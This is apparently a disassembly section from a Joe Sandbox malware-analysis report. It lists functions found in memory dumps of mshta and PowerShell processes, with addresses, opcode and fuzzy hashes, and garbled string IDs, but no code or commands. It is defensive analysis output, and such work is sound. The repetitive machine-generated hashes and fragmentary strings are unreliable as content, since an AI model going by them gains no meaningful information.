                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 06170FD7 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1669867987.0000000006170000.00000010.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6170000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: 6e9a81d203edc7160c9e5af9f571a5b06817666eec6cfe8a044cf859e9120a82
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 06170FDF Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1669867987.0000000006170000.00000010.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6170000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: 6e9a81d203edc7160c9e5af9f571a5b06817666eec6cfe8a044cf859e9120a82
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 06170FCF Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1669867987.0000000006170000.00000010.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6170000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: 6e9a81d203edc7160c9e5af9f571a5b06817666eec6cfe8a044cf859e9120a82
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 06170FE7 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1669867987.0000000006170000.00000010.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6170000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: 6e9a81d203edc7160c9e5af9f571a5b06817666eec6cfe8a044cf859e9120a82
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:

                                                                              Executed Functions

                                                                              Function 07501178 Relevance: 2.9, Strings: 2, Instructions: 439COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: 29fd455957d6211794d3c009d4a70cd7ab3a77cfd1d1ab870667d16e7fc192d2
                                                                              • Instruction ID: 85f7f0601f4962e2ad56fe2c6fa0ed3c62b23cbda429644c5279408d870faddb
                                                                              • Opcode Fuzzy Hash: 29fd455957d6211794d3c009d4a70cd7ab3a77cfd1d1ab870667d16e7fc192d2
                                                                              • Instruction Fuzzy Hash: E7F1E7B4B00609DFCB149F68D815AAEBBE2FBC9710F24846AE8059F391DA31DC45C7D2
                                                                              Function 075004F8 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: ff192bb6a57385942d534fb1146bc4e599761ceca2170e4c455a2d38d559c890
                                                                              • Instruction ID: 5083c7a146be7cf7756c3fab6731a375f7bf996f8124bcf2b026cb60a94c4c8f
                                                                              • Opcode Fuzzy Hash: ff192bb6a57385942d534fb1146bc4e599761ceca2170e4c455a2d38d559c890
                                                                              • Instruction Fuzzy Hash: 6C5145B1B00254AFCB249B689814BAABFE6BBC9710F14885BE549DF3C1CA71DC45C7E1
                                                                              Function 07501114 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q
                                                                              • API String ID: 0-2862610199
                                                                              • Opcode ID: b1cd053a70691aa94b11579af1d9262a997060470579b487e9bbc316678693b3
                                                                              • Instruction ID: 8add4250411b34a9ec66194d8f41f8eda6d943bf0adcad99de61796d10325b21
                                                                              • Opcode Fuzzy Hash: b1cd053a70691aa94b11579af1d9262a997060470579b487e9bbc316678693b3
                                                                              • Instruction Fuzzy Hash: F8A1E4B0A0060ADFCB18CF68D455AADBBE2BB85710F18859AE8159F3D1DB31DC45CBD2
                                                                              Function 0750115C Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q
                                                                              • API String ID: 0-2862610199
                                                                              • Opcode ID: c8bad9a2889e447cd18164de69b9f00ccccfd0a84e2144ed3c165a2dd43ebbc3
                                                                              • Instruction ID: 07cee52e1caa981cf49b60beb2f1a66ed2464ce7ad057c553019489412cc90ed
                                                                              • Opcode Fuzzy Hash: c8bad9a2889e447cd18164de69b9f00ccccfd0a84e2144ed3c165a2dd43ebbc3
                                                                              • Instruction Fuzzy Hash: 519192B0A00609DBCB14CF58D555BAEBBF2BB88710F28845AE9159F391DB31DC45CBD2
                                                                              Function 075005E9 Relevance: .1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9823bdc23268e2bb278fe10384845b49a3f0c007dc538327e33e38df1a73699f
                                                                              • Instruction ID: b1beb25bc3ba6e3a0e514674051dd432db134081c81ff93a70722fd30928befd
                                                                              • Opcode Fuzzy Hash: 9823bdc23268e2bb278fe10384845b49a3f0c007dc538327e33e38df1a73699f
                                                                              • Instruction Fuzzy Hash: C70147B570035437D624967A9C11BAB6B87BBC5724FA0C41BF54CDF3D1DAA1ED8043A2

                                                                              Non-executed Functions

                                                                              Function 07500B70 Relevance: 5.2, Strings: 4, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 2d20f830f1ce2f23ce73b5c93c86a78a47d0d9bf91fff9abd92039a228417777
                                                                              • Instruction ID: b75ef17f740c9c1e3c57d9b03d129e7af3368985a2ed1e70523a7305b1f53c58
                                                                              • Opcode Fuzzy Hash: 2d20f830f1ce2f23ce73b5c93c86a78a47d0d9bf91fff9abd92039a228417777
                                                                              • Instruction Fuzzy Hash: 7F5106B16143498FCB259B7894147EABBF2BF82210F1484ABD449CB2D6DB31DC85C7E2
                                                                              Function 07500080 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1823091409.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7500000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 0661a45e7d503e78220bd4361676a9d8cfe680aa45ebcc065a5ebf4dceabb213
                                                                              • Instruction ID: 0388fb0ef774b5ec04d45524bf808cff302c17e3aca5a36ba919c343a83b82ac
                                                                              • Opcode Fuzzy Hash: 0661a45e7d503e78220bd4361676a9d8cfe680aa45ebcc065a5ebf4dceabb213
                                                                              • Instruction Fuzzy Hash: AF016261B493C90FC72A06681C34AAA6FB67BC355036945EBC085DF2DBCD558D4A83E2

                                                                              Executed Functions

                                                                              Function 07671C10 Relevance: 5.6, Strings: 4, Instructions: 603COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1704027626.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7670000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-1420252700
                                                                              • Opcode ID: d96c7b19c8c4fc0110ec153c1c3afd355b5d8671f1cc52ef9597606ff0dd1544
                                                                              • Instruction ID: 21ca193c5ff4fd070f6b7fcc5c6f52c25e07af6f898d4e7f031afaf19ae39576
                                                                              • Opcode Fuzzy Hash: d96c7b19c8c4fc0110ec153c1c3afd355b5d8671f1cc52ef9597606ff0dd1544
                                                                              • Instruction Fuzzy Hash: 511229B17043498FC7258A78981176ABFB6AFC6351F1484ABD506CF352DE31C986CBA2
                                                                              Function 04C029F0 Relevance: .2, Instructions: 207COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1699000958.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4c00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c6fa7e25cea28939ce4ad2950bb7d96060911fde23858096abd9023c39fe80a
                                                                              • Instruction ID: 65d118771827d94d688a7f365cdf7823a62e7d47fe77d742ae953213801cb61e
                                                                              • Opcode Fuzzy Hash: 3c6fa7e25cea28939ce4ad2950bb7d96060911fde23858096abd9023c39fe80a
                                                                              • Instruction Fuzzy Hash: 65917D74A006558FCB15CF59C4989AEFBB2FF48310B2485A9D815AB3A5C735FC91CFA0
                                                                              Function 07671BF2 Relevance: .1, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1704027626.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7670000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 18ca18ff027e3abae6a780ab33d7e0aca6ed2b4cc5cded1fdc202c6985df9387
                                                                              • Instruction ID: 59eb3e02d0253967760c749a9f8c38c82fe841c6e81171d467d796def33ecc41
                                                                              • Opcode Fuzzy Hash: 18ca18ff027e3abae6a780ab33d7e0aca6ed2b4cc5cded1fdc202c6985df9387
                                                                              • Instruction Fuzzy Hash: 8841E9F160030A9FCB298B658841B697BB2AFC7394B148097C5469F356D735C945CFA2
                                                                              Function 04C02B00 Relevance: .1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1699000958.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4c00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b6cea7454f50976b1ad6cfeb6c75e7626e020b328b195892740953d282fe859
                                                                              • Instruction ID: 5f563b737b7f9ffcf9e9d06763e1e97fcda28608671c5f188c3890f0f4b2dde0
                                                                              • Opcode Fuzzy Hash: 2b6cea7454f50976b1ad6cfeb6c75e7626e020b328b195892740953d282fe859
                                                                              • Instruction Fuzzy Hash: B0413AB4A005159FCB05CF58C598AAAFBB2FF48310B158599D815AB3A4C736FD91CF90
                                                                              Function 04C04C18 Relevance: .1, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1699000958.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4c00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e78d406e463abfe44c12480e58ec57d2fec8bcfb5d767de9393658c18cf0e6f3
                                                                              • Instruction ID: a041aee23705494b0f564c9dc45a9688f933d0ccfd3c08e7c3f1f962995de4bb
                                                                              • Opcode Fuzzy Hash: e78d406e463abfe44c12480e58ec57d2fec8bcfb5d767de9393658c18cf0e6f3
                                                                              • Instruction Fuzzy Hash: 0D1107B4A00209DFCB04DF98D5809AEFBB5FF88310B158599E919AB361C731FD41CBA0
                                                                              Function 00E5D005 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1698410963.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_e5d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e533c055cfff66e1663d4910497330d38605793580b6adf090d6c608fc5341bb
                                                                              • Instruction ID: 4f15ba041115e234f09b3be9db223bc83044ae27f365c7d7169f481397376519
                                                                              • Opcode Fuzzy Hash: e533c055cfff66e1663d4910497330d38605793580b6adf090d6c608fc5341bb
                                                                              • Instruction Fuzzy Hash: 15012D6100E3C05ED7128B258C94B52BFB89F53229F1D85DBDC889F2E3C2695849C772
                                                                              Function 00E5D01D Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1698410963.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_e5d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ce2d8c2fb856a0d9bea28ed42b1a6b4cd4daf5fe2e9ef099a3576ddf6641ade8
                                                                              • Instruction ID: 43c0a547794ef127fbec703d06552f6f5c125361d06d414ba1ebe2b0490c7aac
                                                                              • Opcode Fuzzy Hash: ce2d8c2fb856a0d9bea28ed42b1a6b4cd4daf5fe2e9ef099a3576ddf6641ade8
                                                                              • Instruction Fuzzy Hash: DD01F73100D3009AE7204E25CDC4B67BF98DF41325F18C829EC495A286C2799C4AC6B1

                                                                              Non-executed Functions

                                                                              Function 07671270 Relevance: 9.2, Strings: 7, Instructions: 498COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1704027626.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7670000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1608119003
                                                                              • Opcode ID: 511e9900f6942c4393fbc15f19a10d058f47e4b942afcb3e94ccc459b925c13b
                                                                              • Instruction ID: bf3de7183c13fa46c3c07f480e535a36dcde7fd8270136da21b44beeeb4cdfc4
                                                                              • Opcode Fuzzy Hash: 511e9900f6942c4393fbc15f19a10d058f47e4b942afcb3e94ccc459b925c13b
                                                                              • Instruction Fuzzy Hash: 48F14BB57043098FDB188A7894016AABBE6EFC6760F18847BD406CF355DE31DD4AC791
                                                                              Function 076704E0 Relevance: 9.1, Strings: 7, Instructions: 325COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1704027626.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7670000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1608119003
                                                                              • Opcode ID: ae5aafcc67f58fc6861a790d93f378a8443657433dd4c1111ab741555a8779f4
                                                                              • Instruction ID: b310312c296b25507b80ef7c439717e3064b2baa895960a78b668e89a944bef9
                                                                              • Opcode Fuzzy Hash: ae5aafcc67f58fc6861a790d93f378a8443657433dd4c1111ab741555a8779f4
                                                                              • Instruction Fuzzy Hash: 5EA17AB17043568FD7258A79981067ABBE6EFC5660F28846BD406CF352DE31C846CBF1
                                                                              Function 0767320A Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1704027626.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7670000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 1caf3725c38f59c67ba46b57a8f68726dd7069d03c8d57c4d0436309df767024
                                                                              • Instruction ID: ad275fcf7483306024c379fefee9c5ffee7ab45f5d2de677ac38dc2399e27c92
                                                                              • Opcode Fuzzy Hash: 1caf3725c38f59c67ba46b57a8f68726dd7069d03c8d57c4d0436309df767024
                                                                              • Instruction Fuzzy Hash: 2731ABB23083C55FD725563B5C01BA67FAA9FC66A0F64806BE406CF393CD26C845C362
                                                                              Function 07673228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1704027626.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7670000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: cdfad55720e3ab714457312fd882127c2f179ab1ad7bc95fd2e0b63a6d4cee6c
                                                                              • Instruction ID: 2db8cb8474ef332a1ceadb37ce18d2fb9fad0723fcfc76a4d79b7fac2ad8898b
                                                                              • Opcode Fuzzy Hash: cdfad55720e3ab714457312fd882127c2f179ab1ad7bc95fd2e0b63a6d4cee6c
                                                                              • Instruction Fuzzy Hash: CB218BB13043969BDB34597F9C04B2BABDA9BC5B90F64843AE406CF381DD32C841C361
                                                                              Function 0767030A Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1704027626.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7670000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 11e16661041918c400e05a2bbb2bec3c903bcaeebff5ead949314ec3376d0cab
                                                                              • Instruction ID: 02b042d9072ac688ea896703407011190165173be07b35dec9431cd7c4b3c0f5
                                                                              • Opcode Fuzzy Hash: 11e16661041918c400e05a2bbb2bec3c903bcaeebff5ead949314ec3376d0cab
                                                                              • Instruction Fuzzy Hash: 8F01A2617493964FC72B127868201956FB25BC396071945D7C081CF3ABCD158D4A83B7

                                                                              Executed Functions

                                                                              Function 00E9D005 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.1846785675.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_e9d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 77f964f0fc351bad6b4c8a9e8d1b36067318a0d9833ba1fdd6dc139297942801
                                                                              • Instruction ID: 77387ee93b9170cc5c734c4b6ef08632c697a4b2c73f53c44dbcaa64ac5ee49f
                                                                              • Opcode Fuzzy Hash: 77f964f0fc351bad6b4c8a9e8d1b36067318a0d9833ba1fdd6dc139297942801
                                                                              • Instruction Fuzzy Hash: DB01406100E3C09FD7128B258C94752BFB4DF53228F1DC5DBD9889F1A3C2695849C772
                                                                              Function 00E9D01D Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.1846785675.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_e9d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 096b904c0e0f3c694de8dbed5d61dafeb18e3c21d15fad32e194a6e46140aff6
                                                                              • Instruction ID: 37eae856e4b48cf114f3ce34075a25305dea9c01c845fc5408c05491895997e7
                                                                              • Opcode Fuzzy Hash: 096b904c0e0f3c694de8dbed5d61dafeb18e3c21d15fad32e194a6e46140aff6
                                                                              • Instruction Fuzzy Hash: 6C01267100D3109AEB108A29CD84BA7FF98EF41328F18C52AED086B286C279DC41C6B1
                                                                              Function 04803006 Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.1847787236.0000000004800000.00000040.00000800.00020000.00000000.sdmp, Offset: 04800000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_4800000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7830314ffe1829737fadd991cda46a6bec6f37f9e5b944eea7f4aae9a584b994
                                                                              • Instruction ID: 2e9cd8df2b31266cc1bcd406e1cbf6b1c94b0ffb1964c6cde78e0a27b01c593a
                                                                              • Opcode Fuzzy Hash: 7830314ffe1829737fadd991cda46a6bec6f37f9e5b944eea7f4aae9a584b994
                                                                              • Instruction Fuzzy Hash: 4DF0D435A001099FCB15CF9DD990AEEF7B1FF88324F208259E515A72A1C736AC62CB60

                                                                              Executed Functions

                                                                              Function 07D93F48 Relevance: 21.3, Strings: 16, Instructions: 1281COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (bq$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q
                                                                              • API String ID: 0-621706134
                                                                              • Opcode ID: 66e863c4ebae1c2a8ec1619fd00774cce3fbfe818f4c2fc952fb526724dcee65
                                                                              • Instruction ID: 7b0cc3279299cc8e38fb2452d62dd25849cf5e4f78d550b04b584ba346469737
                                                                              • Opcode Fuzzy Hash: 66e863c4ebae1c2a8ec1619fd00774cce3fbfe818f4c2fc952fb526724dcee65
                                                                              • Instruction Fuzzy Hash: 649212B17043859FCF249B68981066BFBA6AFC6214F1884BAD545CF352DE32DC87C7A1
                                                                              Function 07D92870 Relevance: 12.5, Strings: 9, Instructions: 1290COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0U^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-466180782
                                                                              • Opcode ID: b6b159d034603372e6ddf24f7f8bbed74363fbc56e17253f5478956fb767a02e
                                                                              • Instruction ID: 67fa26acb2afb7369c05ea5aa0220bd752f71e037965f506ea8688cbb2cba544
                                                                              • Opcode Fuzzy Hash: b6b159d034603372e6ddf24f7f8bbed74363fbc56e17253f5478956fb767a02e
                                                                              • Instruction Fuzzy Hash: 619226B1B043069FCF249B68984466AFBE6AFC6324F1884BAD445CF355DE32DC46C7A1
                                                                              Function 07D90458 Relevance: 6.4, Strings: 5, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3272787073
                                                                              • Opcode ID: 3629640ed115a48f0518701bead71cbe7bf9e552a5dbd6e71bf4752abdfe2b46
                                                                              • Instruction ID: 8c77c42f647db65bb7c53765d1545134adea6fb9aa1b99545f50e28017c7b841
                                                                              • Opcode Fuzzy Hash: 3629640ed115a48f0518701bead71cbe7bf9e552a5dbd6e71bf4752abdfe2b46
                                                                              • Instruction Fuzzy Hash: D35135B1B0030B9FCF649A69A81077AFBE6AFC1600F14807AD444CF295DF36C985C7A1
                                                                              Function 07D90438 Relevance: 3.9, Strings: 3, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$$^q$$^q
                                                                              • API String ID: 0-2291298209
                                                                              • Opcode ID: 761a16466b857a95f24846dbcad34a3682361cf56867bc1be88ddb5a2eab1cbf
                                                                              • Instruction ID: e3749c4477aad4b4e34a3f8014122cb13a6b8f52b41b22f85cb7a7233faad631
                                                                              • Opcode Fuzzy Hash: 761a16466b857a95f24846dbcad34a3682361cf56867bc1be88ddb5a2eab1cbf
                                                                              • Instruction Fuzzy Hash: 783133F0A00307EFDF649A29E41077AFBE1AF81714F548076D804CB291DB35CA80CBA1
                                                                              Function 07D90B80 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
